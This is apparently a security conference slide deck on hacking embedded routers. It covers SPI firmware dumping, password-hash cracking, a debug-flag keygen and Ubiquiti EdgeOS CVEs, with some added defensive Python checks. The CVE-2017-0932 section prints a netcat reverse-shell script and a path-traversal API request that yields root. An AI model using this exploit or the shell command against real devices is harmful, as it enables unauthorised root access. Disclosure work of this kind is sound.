Internet of Sh*t
Hacking Embedded Devices
Maycon Vitali
maycon at hacknroll dot com
Agenda
• Who Am I?
• General Overview
• Toolset
• Firmware Extraction
• Serial Interface
• Reverse Engineering
• UBNT Findings – CVE-2017-093[2-5]
• Conclusion
Who am I?
• Senior Security Consultant @ SpiderLabs
• Security Researcher @ Hack N’ Roll
• Main duties:
• Web Application Pentest
• Network Pentest
• Mobile Application Pentest (SL-TT)
• ATM Pentest
• Embedded Devices Pentest
General Overview
General Overview
• Used by 64% of organizations
• Present in almost 100% of all residences.
• [g]old architecture design.
• Operating system with almost no protection (80s-style exploitation)
• Security isn’t a “MUST DO” for developers.
• Common weaknesses.
Toolset
Main Toolset
• Reversing
• radare2
• Firmware Extraction (SPI)
• SOIC Clip
• BusPirate / Raspberry Pi
• flashrom
• Debugging
• qemu-user
• gdb (target arch)
• gcc-multilib
• gef
Firmware Extraction
• Vendor Download Page
• Network Sniffing
• Firmware Upgrade
• SPI Extraction
SPI Extraction
Target
ZHAL> ATSH
FW Version : V1.13(WUK.0)b6
External Version : BR_SO_V1.13(WUK.0)b6
Bootbase Version : V1.10 | 01/18/2016
Vendor Name : MitraStar Technology Corp.
Product Model : DSL-100HN-T1-NV
Serial Number : ACC6629493C0
First MAC Address : ACC6629493C0
Last MAC Address : ACC6629493C3
MAC Address Quantity : 04
Default Country Code : D0
Boot Module Debug Flag : 00
Kernel Checksum : d831a525
RootFS Checksum : a4b2b045
RomFile Checksum : daa5645d
Main Feature Bits : 00
SPI Pinout
• CS – Chip Select
• SI – Serial In
• SO – Serial Out
• SCLK – Clock
• RESET# – Reset (not used)
• VCC – Power supply
• GND – Ground
MX25L12835F Datasheet
BusPirate
Using flashrom
[maycon@DayOfDevil ~]$ flashrom 
> -p buspirate_spi:dev=/dev/buspirate,spispeed=1M 
> -c "MX25L12835F/MX25L12845E/MX25L12865E" 
> -r flash.dump
flashrom v0.9.9-r1955 on Linux 4.14.7-1-ARCH (x86_64)
flashrom is free software, get the code at https://flashrom.org
Calibrating delay loop... OK.
Found Macronix flash chip "MX25L12835F/MX25L12845E/MX25L12865E" (16384 kB, SPI)
on buspirate_spi
Reading flash... done
Using binwalk
• -e means [e]xtract files
[maycon@DayOfDevil ~]$ binwalk -e flash.dump
DECIMAL HEXADECIMAL DESCRIPTION
--------------------------------------------------------------------------------
26112 0x6600 LZMA compressed data, properties: 0x5D, ...
69600 0x10FE0 LZMA compressed data, properties: 0x5D, ...
197120 0x30200 LZMA compressed data, properties: 0x5D, ...
1372293 0x14F085 Squashfs filesystem, little endian, version 4.0, ...
8389120 0x800200 LZMA compressed data, properties: 0x5D, ...
9564293 0x91F085 Squashfs filesystem, little endian, version 4.0, ...
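An added example in Python (not the author's tooling) that turns a binwalk listing like the one above into a carve plan: the decimal and hexadecimal columns are cross-checked, each signature region runs to the next offset, and the Squashfs entries are listed so both root filesystems can be cut out with dd. The listing is embedded as constructed input copied from the slide; FLASH_SIZE is the 16384 kB that flashrom reported.

```python
import re

# Constructed input: the binwalk rows shown on the slide, offsets unchanged.
BINWALK_OUTPUT = """\
DECIMAL HEXADECIMAL DESCRIPTION
--------------------------------------------------------------------------------
26112 0x6600 LZMA compressed data, properties: 0x5D, ...
69600 0x10FE0 LZMA compressed data, properties: 0x5D, ...
197120 0x30200 LZMA compressed data, properties: 0x5D, ...
1372293 0x14F085 Squashfs filesystem, little endian, version 4.0, ...
8389120 0x800200 LZMA compressed data, properties: 0x5D, ...
9564293 0x91F085 Squashfs filesystem, little endian, version 4.0, ...
"""
FLASH_SIZE = 16384 * 1024  # 16 MB MX25L12835F, as reported by flashrom

LINE_RE = re.compile(r"^(\d+)\s+(0x[0-9A-Fa-f]+)\s+(.*)$")


def parse_binwalk(text):
    """Return [(offset, description)]; reject rows whose two offset columns disagree."""
    rows = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue  # header, separator or blank line
        dec, hexval, desc = int(m.group(1)), int(m.group(2), 16), m.group(3)
        if dec != hexval:
            raise ValueError(f"offset columns disagree: {line!r}")
        rows.append((dec, desc))
    return rows


def carve_plan(rows, flash_size):
    """Each signature region extends to the next signature, the last to end of flash."""
    offsets = [o for o, _ in rows] + [flash_size]
    return [(o, offsets[i + 1] - o, d) for i, (o, d) in enumerate(rows)]


def squashfs_copies(plan):
    """Offsets of Squashfs images. Two of them, each the same distance after an LZMA
    kernel (0x14F085-0x30200 == 0x91F085-0x800200), means two copies of the image."""
    return [o for o, _, d in plan if d.startswith("Squashfs")]


def dd_command(dump, entry):
    """Shell command that carves one region (bs=1 is slow but exact)."""
    off, length, _ = entry
    return f"dd if={dump} of=part_{off:#x}.bin bs=1 skip={off} count={length}"
```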
Binary Emulation
[maycon@DayOfDevil squashfs-root]$ file bin/ls
bin/ls: symbolic link to busybox
[maycon@DayOfDevil squashfs-root]$ file bin/busybox
bin/busybox: ELF 32-bit MSB executable, MIPS, MIPS32 rel2 version 1 (SYSV), dynamically
linked, interpreter /lib/ld-uClibc.so.0, stripped
[maycon@DayOfDevil squashfs-root]$ cp $(which qemu-mips-static) .
[maycon@DayOfDevil squashfs-root]$ ls -la qemu-mips-static
-rwxr-xr-x 1 maycon users 3289936 Feb 19 03:47 qemu-mips-static
[maycon@DayOfDevil squashfs-root]$ sudo chroot . ./qemu-mips-static bin/ls
bin etc proc sys usr
boaroot lib qemu-mips-static tmp var
dev linuxrc sbin userfs
Serial Interface
UART
UART Interface
Reverse Engineering
# cat > /etc/passwd
support:$1$$CoERg7ynjYLsj2j4glJ34.:0:0:root:/:/bin/cmdsh
admin:$1$$C1ky1AR55g1vIlMrcvBNM1:0:0:root:/:/bin/sh
$ ./john ./_flash.dump.extracted/squashfs-root/usr/etc/passwd
Using default input encoding: UTF-8
Loaded 1 password hash (md5crypt, crypt(3) $1$ [MD5 256/256 AVX2 8x3])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
1234 (admin)
1g 0:00:00:00 DONE 2/3 (2017-12-21 20:46) 4.545g/s 24818p/s 24818c/s 24818C/s 123456..larry
Use the "--show" option to display all of the cracked passwords reliably
Session completed
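The passwd file above has two UID 0 accounts whose md5crypt hashes use an empty salt ($1$$), and john recovers the admin one in under a second. An added example (not the author's code) that audits a passwd file pulled from an extracted root filesystem for exactly those weaknesses; the two entries are embedded as constructed input copied from the slide.

```python
import re
from dataclasses import dataclass

# Constructed input: the two /etc/passwd lines shown on the slide.
PASSWD = """\
support:$1$$CoERg7ynjYLsj2j4glJ34.:0:0:root:/:/bin/cmdsh
admin:$1$$C1ky1AR55g1vIlMrcvBNM1:0:0:root:/:/bin/sh
"""

# $1$<salt>$<22 chars of ./0-9A-Za-z>; the salt may be empty, as it is here.
MD5CRYPT_RE = re.compile(r"^\$1\$([^$]*)\$[./0-9A-Za-z]{22}$")


@dataclass
class Finding:
    user: str
    issues: list


def audit_passwd(text):
    """Flag UID 0 accounts, hashes kept in passwd rather than shadow, md5crypt and empty salts."""
    findings, uid0 = [], []
    for line in text.splitlines():
        if not line.strip():
            continue
        fields = line.split(":")
        if len(fields) != 7:
            raise ValueError(f"malformed passwd entry: {line!r}")
        user, pw, uid, _gid, _gecos, _home, _shell = fields
        issues = []
        if uid == "0":
            issues.append("uid 0")
            uid0.append(user)
        if pw not in ("x", "*", "!"):  # a real hash, not a shadow placeholder
            issues.append("hash stored in passwd, not shadow")
            m = MD5CRYPT_RE.match(pw)
            if m:
                issues.append("md5crypt (fast, no work factor)")
                if m.group(1) == "":
                    issues.append("empty salt")
        if issues:
            findings.append(Finding(user, issues))
    if len(uid0) > 1:  # several root-equivalent logins, each a separate target
        for f in findings:
            if f.user in uid0:
                others = ", ".join(u for u in uid0 if u != f.user)
                f.issues.append("shares uid 0 with " + others)
    return findings
```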
Reverse Engineering
• puts(“Password incorrect !”);
• system(…)
• strcmp(…, “18vudl1b.4”);
Bootloader
ATEN Keygen
Reversing the ATEN algorithm
[maycon@DayOfDevil Vivo]$ ./aten_bypass C6629493C0
To enable DebugFlag:
ZHAL> ATEN 1,10F0A563
To disable DebugFlag:
ZHAL> ATEN 0,10F0A563
UBNT Findings
CVE-2017-0935 – Privilege Escalation with Session Hijacking
operator@ubnt:~$ df -h
Filesystem Size Used Available Use% Mounted on
ubi0_0 214.9M 144.4M 65.8M 69% /root.dev
aufs 214.9M 144.4M 65.8M 69% /
devtmpfs 124.4M 0 124.4M 0% /dev
tmpfs 124.5M 56.0K 124.4M 0% /run
tmpfs 124.5M 56.0K 124.4M 0% /run
tmpfs 124.5M 52.0K 124.4M 0% /var/log
tmpfs 124.5M 0 124.5M 0% /tmp
none 124.5M 112.0K 124.4M 0% /opt/vyatta/config
operator@ubnt:~$
CVE-2017-0935 – Privilege Escalation with Session Hijacking
operator@ubnt:~$ df -h
Filesystem Size Used Available Use% Mounted on
ubi0_0 214.9M 144.4M 65.8M 69% /root.dev
aufs 214.9M 144.4M 65.8M 69% /
devtmpfs 124.4M 0 124.4M 0% /dev
tmpfs 124.5M 60.0K 124.4M 0% /run
tmpfs 124.5M 60.0K 124.4M 0% /run
tmpfs 124.5M 52.0K 124.4M 0% /var/log
tmpfs 124.5M 0 124.5M 0% /tmp
none 124.5M 112.0K 124.4M 0% /opt/vyatta/config
unionfs 124.5M 0 124.5M 0% /opt/vyatta/config/tmp/new_config_g73ik18gms70ciap15in0mttpt0vk81b
operator@ubnt:~$
CVE-2017-0934 – Privilege Escalation with Session Hijacking
total 0
drwxrwxrwt 4 root root 300 Jan 1 00:07 .
drwxr-xr-x 31 root root 760 Jan 1 00:00 ..
srwxr-x--- 1 root root 0 Jan 1 00:00 .imi_line
srw-rw---- 1 root root 0 Jan 1 00:00 .imi_show
srw-rw---- 1 root root 0 Jan 1 00:00 .nsm_show
srwxr-x--- 1 root root 0 Jan 1 00:00 .nsmserv
srwxr-x--- 1 root root 0 Jan 1 00:00 .rib_serv
srw-rw---- 1 root root 0 Jan 1 00:00 .rib_show
drwxrwxr-x 2 root vyattacf 60 Jan 1 00:07 changes_only_9ckaihkfskhjt4q7t7d52c87tfvnbioi
drwxr-x--- 2 root root 40 Jan 1 00:00 ifp
srwxrwx--- 1 root vyattacf 0 Jan 1 00:00 ubnt.socket.cfgd
srwxrwx--- 1 root www-data 0 Jan 1 00:00 ubnt.socket.cli
srw-rw---- 1 root users 0 Jan 1 00:00 ubnt.socket.platd
srwxrwx--- 1 root www-data 0 Jan 1 00:00 ubnt.socket.statsd
srwxrwx--- 1 root www-data 0 Jan 1 00:00 ubnt.socket.sysd
CVE-2017-0933 – CSRF Bypassing “Referer:” Whitelisting Protection
$ ls -la fake_www/
total 16
drwxr-xr-x 2 hnrteam users 4096 jun 15 02:08 .
drwxr-xr-x 7 hnrteam users 4096 jun 15 02:03 ..
-rw-r--r-- 1 hnrteam users 3847 jun 15 02:05 index.html
-rw-r--r-- 1 hnrteam users 232 jun 15 02:03 lighttpd.conf
The content of the lighttpd.conf file:
server.document-root = "/home/operator/fake_www"
server.port = 3000
mimetype.assign = (
".html" => "text/html",
)
index-file.names = ( "index.html" )
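A Referer whitelist that only matches the host name is satisfied by a page served from the device itself on another port, which is what the fake_www setup above provides. The slide does not show how the vendor's whitelist was implemented; the added example below (not the vendor's code) assumes a host-only comparison and contrasts it with a check of the full origin, taken from the Origin header first and the Referer header second.

```python
from urllib.parse import urlsplit

# The device UI origin, as seen in the slide's request headers.
TRUSTED_ORIGIN = "https://192.168.2.1"


def host_only_check(referer):
    """Weak (assumed) check: any scheme or port on the device host passes,
    including a page an operator hosts on the device on port 3000."""
    return urlsplit(referer).hostname == urlsplit(TRUSTED_ORIGIN).hostname


def _origin(url):
    """Normalise a URL to scheme://host:port, filling in the default port."""
    p = urlsplit(url)
    if p.scheme not in ("http", "https") or not p.hostname:
        return None
    port = p.port or (443 if p.scheme == "https" else 80)
    return f"{p.scheme}://{p.hostname}:{port}"


def full_origin_check(origin_header, referer_header):
    """Stricter check: prefer Origin, fall back to Referer, compare the whole
    origin (scheme, host and port) and fail closed when both are absent."""
    for value in (origin_header, referer_header):
        if value:
            return _origin(value) == _origin(TRUSTED_ORIGIN)
    return False
```

Origin matching is a secondary defence only; a per-session anti-CSRF token on the JSON API is the primary one.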
CVE-2017-0932 - Privilege Escalation using API->Feature
$ cat Backdoor/wizard-run
#!/bin/bash
/usr/bin/nc 192.168.2.2:1337 -e /bin/bash &
POST /api/edge/feature.json HTTP/1.1
Host: 192.168.2.1
Referer: https://192.168.2.1/
Content-Type: application/json
X-Requested-With: XMLHttpRequest
Content-Length: 90
Cookie: PHPSESSID=i6um09hej0ku2k5ctcp6ib56f1nrqhi7
Connection: close
{"data":{"scenario":"../../../../../home/operator/Backdoor","action":"load","input":"id"}}
$ nc -lvp 1337
Listening on [0.0.0.0] (family 0, port 1337)
Connection from 192.168.2.1 44440 received!
id
uid=0(root) gid=102(vyattacfg)
uname -a
Linux ubnt 3.10.14-UBNT #1 SMP Sat Apr 22 06:38:07 PDT 2017 mips GNU/Linux
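The request above makes the API run a wizard-run script chosen by the client-supplied "scenario" value, and the traversal in that value points it at a directory the operator account can write to, so the script runs with the API's root privileges. An added example (not the EdgeOS code; the real scenario directory is not on the slide, so SCENARIO_ROOT is an assumed path) of validating that parameter before anything is executed: the name must be a plain identifier and the resolved path must stay inside the scenario root.

```python
import json
import os
import re

SCENARIO_ROOT = "/opt/wizards"  # assumed location of the legitimate scenarios
SCENARIO_NAME_RE = re.compile(r"^[A-Za-z0-9_-]{1,64}$")


def resolve_scenario(root, name):
    """Return <root>/<name>/wizard-run as an absolute path, or None when the
    name is not a plain identifier or resolves (via .. or symlinks) outside root."""
    if not SCENARIO_NAME_RE.match(name):
        return None
    root = os.path.realpath(root)
    candidate = os.path.realpath(os.path.join(root, name, "wizard-run"))
    if os.path.commonpath([root, candidate]) != root:
        return None
    return candidate


def handle_feature_request(body):
    """Validate the JSON body of /api/edge/feature.json; only the "load" action
    shown on the slide is accepted. Returns the script path to run or None."""
    data = json.loads(body).get("data", {})
    if data.get("action") != "load":
        return None
    return resolve_scenario(SCENARIO_ROOT, str(data.get("scenario", "")))
```

The path check is the input-side fix; the privilege side is that a script selected through a www-data-reachable API should not execute as root at all.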
Questions?